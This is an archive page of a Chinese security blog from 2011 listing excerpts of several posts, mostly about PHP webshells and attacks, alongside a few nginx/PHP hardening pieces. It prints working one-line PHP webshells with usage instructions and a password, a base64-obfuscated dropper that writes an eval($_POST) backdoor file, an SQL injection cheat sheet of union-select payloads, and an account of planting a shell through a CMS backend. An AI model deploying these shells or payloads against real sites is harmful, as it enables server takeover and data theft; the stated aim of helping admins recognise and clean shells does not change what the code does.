php最新变异一句话

   
分类:安全 | 2011-10-24 | 撸过 2,292 次
0人扯蛋

注释:站长的任务又加重了,好好认识下,以后见了好清除

本来匿名发在土司上,现在应该传出去了,两个是来自国外的

http://h.ackack.net/tiny-php-shell.html

http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/

具体看国外的文章吧

第一种:1.php

<?=($_=@$_GET[2]).@$_($_GET[1])?>

在菜刀里写http://www.92hack.net/1.php?2=assert密码是1

第二种2.php

<?

$_=[......]

继续阅读

浅谈PHP可变变量安全

   
分类:安全 | 2011-10-20 | 撸过 988 次
0人扯蛋

本来想写篇长点的文档的,后来想想这个东西已经被各路牛人实战得无比纯熟了,所以我就只简单的说一下这个东西。

记得我刚接触PHP安全的时候,问几位大牛怎么入门,他们总是和我说去看PHP手册吧,安全就是基础。

没错,我要说的东西在PHP手册里就有非常详细的说明:.net/manual/zh/language.variables.variable.php">http://php.net/manual/zh/language.variables.variable.php,所以强烈要求看了手册后再接着往下看!

可变变量是PHP一个非常方便的特性,手册里已经说了,可变变量的意思就是一个变量的变量[......]

继续阅读

破解php代码混淆加密的程序

   
分类:安全 | 2011-10-18 | 撸过 1,576 次
3人扯蛋

代码混淆加密——虽然是雕虫小技的加密方式,但手工解出来还是蛮费时间,尤其是有一大堆加密程序的时候。
今天兴致还不错,写了个php解密程序,解密效果完美,批量解密也是一个爽!

注意:程序会在同目录生成和删除 tmp.php

<?php

/*
* by 267014855
* 2011-7-18
*/

//$file = 'global.func.php';
$hd = opendir('./');
while($f=readdir($hd)){
if($f == '.' || $f == '..') continue;

$file = $f;
$strs = file($file[......]

继续阅读

后台单独生成php页面拿shell

   
分类:安全 | 2011-10-17 | 撸过 1,301 次
0人扯蛋

天群里一个鸟人丢个后台叫帮忙拿shell。一看是FCK,就各种去弄了...结果无功而返,PHP语言。过程就不说了,不是重点.后来在前台打开各种链接以及配合后台查看发现他的关于我们\招贤纳士只能的页面是独立的php页面.这就好办了。写个一句话即可。至于怎么写,我这就扯下。

看代码:

<div id="con660">
<div>
<h4>业务领域</h4>
<span>标题</span><br>
<br>
<span>标题2</span><br>
<div[......]

继续阅读

简述Php脚本注入技术

   
分类:安全 | 2011-10-17 | 撸过 858 次
0人扯蛋

Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的时候我们怎么防范php的字符变量注入呢?其实只需将提交的变量中的所有单引号、双引号、反斜线和空字告符自动转换为含有反斜线的转义字符。如把“’”变成“\”,把“\”变成“\\”,就ok了。下面我们分为对magic_quotes_gpc=off和ma[......]

继续阅读

关于Nginx+PHP的虚拟主机目录权限控制的探究

   
分类:安全 | 2011-10-9 | 撸过 945 次
1人扯蛋

Nginx的使用者最近越来越多,很多大型网站也都从Apache或其他平台迁移到了Nginx。但在我使用Nginx的过程中有个问题一直未得到解决,就是如何限制Nginx+PHP的目录权限

我们知道,在Apache中可以很容易的对虚拟目录进行权限控制,如:

<VirtualHost www.xpb.cn>

ServerAdmin xiaopb@live.com

DocumentRoot /usr/www/xpb/

ServerName www.xpb.cn:80

ServerAlias www.xpb.cn

ErrorLog logs/default-error_log[......]

继续阅读

nginx+fastcgi+php安全虚拟主机隔离配制方法

   
分类:技术 | 2011-10-9 | 撸过 1,015 次
0人扯蛋

网上关于nginx +fastcgi+php 虚拟主机独立站点安全配置文章很多。

其中 关于Nginx+PHP的虚拟主机目录权限控制的探究 文章已经讲的很详细了。方法很多,有设置http://www.cnblogs.com/http://www.cnblogs.com/ 特殊目录的,有通过open_basedir配制独立站点,独立目录的。 还有将所有站点目录都写在open_basedir里面。只是没有站点用比较特殊目录名称。别人不知道目录的。是进去不了。还有修改php 源码,加入root_path限制,访问目录。

那么我写这篇文章,不想再去考虑怎么样限制在某个目录了。[......]

继续阅读

PHPCMS FileManager v4.03 FileRead Vulnerability

   
分类:安全 | 2011-10-2 | 撸过 847 次
0人扯蛋

#
#Author : HeXie S3curity TeAm
#Date : 2011.10.01
#

#FIle : /image.php
<?php
/*
*#########################################
* PHPCMS File Manager
* Copyright (c) 2004-2006 phpcms.cn
* Author: Longbill ( www.longbill.cn )
* longbill.cn@gmail.com www.2cto.com
*#####################################[......]

继续阅读

PHP+MySQL 手工注入语句

   
分类:安全 | 2011-09-30 | 撸过 1,397 次
0人扯蛋

暴字段长度
order by num/*

匹配字段
and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息
version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*

操作系统信息:
and[......]

继续阅读

PHP一句话变型

   
分类:安全 | 2011-09-29 | 撸过 1,326 次
0人扯蛋

<?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?>

<script language="php">@fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));</script>

//file:lost.php

//p[......]

继续阅读